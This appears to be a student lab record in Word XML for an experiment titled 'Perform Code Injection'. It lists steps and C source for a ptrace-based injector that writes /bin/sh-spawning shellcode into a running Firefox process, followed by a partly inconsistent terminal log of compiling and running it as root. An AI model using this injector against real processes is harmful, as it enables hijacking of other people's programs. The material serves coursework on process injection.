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EC" w:rsidRDefault="006732E1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006732E1">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:pict>
          <v:line id="Straight Connector 1" o:spid="_x0000_s1026" style="position:absolute;z-index:251659264;visibility:visible;mso-position-horizontal-relative:margin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<v:stroke joinstyle="miter"/>
            <w10:wrap anchorx="margin"/>
          </v:line>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00C45AEC" w:rsidRPr="00C45AEC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>EXPT NO</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C45AEC" w:rsidRPr="00C45AEC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:12</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C45AEC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                    </w:t>
      </w:r>
      <w:r w:rsidR="00DF2875">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">              ROLL NO: 220701203</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F13D5" w:rsidRDefault="00C45AEC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C45AEC">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">  PERFORM CODE INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsid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45AEC" w:rsidRP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do process code injection on Firefox using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ptrace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system call</w:t>
      </w:r>
    </w:p>
    <w:p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AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC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out the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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running Firefox program.</w:t>
      </w:r>
    </w:p>
    <w:p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the code injection file.</w:t>
      </w:r>
    </w:p>
    <w:p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Get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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Firefox from the command line arguments.</w:t>
      </w:r>
    </w:p>
    <w:p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Allocate memory buffers for the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p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Attach to the victim process with PTRACE_ATTACH.</w:t>
      </w:r>
    </w:p>
    <w:p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the register values of the attached process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC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PTRACE_POKETEXT to insert the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p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Detach from the victim process using PTRACE_DETACH</w:t>
      </w:r>
    </w:p>
    <w:p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PROGRAM CODE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b/>
          <w:bCs/>
          <w:color w:val="980000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>INJECTOR PROGRAM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stdio.h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&gt;//C standard input output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stdlib.h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&gt;//C Standard General Utilities Library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string.h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&gt;//C string lib header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unistd.h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&gt;//standard symbolic constants and types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wait.h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&gt;//declarations for waiting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&gt;//gives access to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functionality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user.h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&gt;//gives ref to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regs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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//The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shellcode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that calls /bin/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sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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char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shellcode[]={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"\x31\xc0\x48\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xbb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\xd1\x9d\x96\x91\xd0\x8c\x97"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"\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"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};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//header for our program.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void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header()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"----Memory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bytecode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injector-----\n");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//main program notice we take command line options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int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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main(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intargc,char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**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argv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inti,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size,pid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=0;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structuser_regs_structreg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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;/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/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struct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that gives access to registers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                            //note that this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regs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will be in x64 for me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                            //unless your using 32bit then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rip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,eax,edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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etc...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char*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header(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//we get the command line options and assign them appropriately!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pid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spellStart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atoi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argv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[1]);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size=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sizeof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shellcode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//allocate a char size memory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=(char*)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malloc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(size);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//fill the buff memory with 0s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upto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size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memset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buff,0x0,size);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//copy shellcode from source to destination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memcpy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buff,shellcode,sizeof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shellcode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     //attach process of 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pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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PTRACE_ATTACH,pid,0,0);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//wait for child to change state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wait(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*)0);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     //get process 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pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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registers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i.e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Copy the process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pid's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general-purpose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//or floating-point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registers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,respectively</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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//to the address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in the tracer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PTRACE_GETREGS,pid,0,&amp;reg);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"Writing EIP 0x%x, process %d\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n",reg.eip,pid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//Copy the word data to the address buff in the process's memory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for(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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size;i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++){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PTRACE_POKETEXT,pid,reg.eip+i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,*(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*)(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buff+i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//detach from the process and free buff memory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PTRACE_DETACH,pid,0,0);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free(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return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0;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root@localhost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~]#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viinjector.c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root@localhost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~]#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gccinjector.c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-o injector </w:t>
      </w:r>
    </w:p>
    <w:p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root@localhost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~]#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e|grepfirefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="-270" w:right="626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1433 ?</w:t>
      </w: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00:01:23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root@localhost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~</w:t>
      </w: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]#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./injector 1433</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC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----Memory bytecode injector-----</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="-81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Writing EIP 0x6, process 1707 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC" w:rsidP="00C45AEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="-27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root@localhost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~]#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRDefault="00C45AEC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRDefault="00C45AEC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRDefault="00C45AEC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRDefault="00C45AEC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRDefault="00C45AE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67769">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The implementation of </w:t>
      </w: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process code injection on Firefox using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ptrace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system call</w:t>
      </w:r>
      <w:r w:rsidR="00F677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executed successfully.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidRDefault="00C45AEC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C45AEC" w:rsidRPr="00C45AEC" w:rsidSect="00C45A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4636"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B092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AEC"/>
    <w:rsid w:val="002F13D5"/>
    <w:rsid w:val="006732E1"/>
    <w:rsid w:val="00C45AEC"/>
    <w:rsid w:val="00DF2875"/>
    <w:rsid w:val="00F67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E1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00C45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45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PK</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-08T17:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-08T17:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>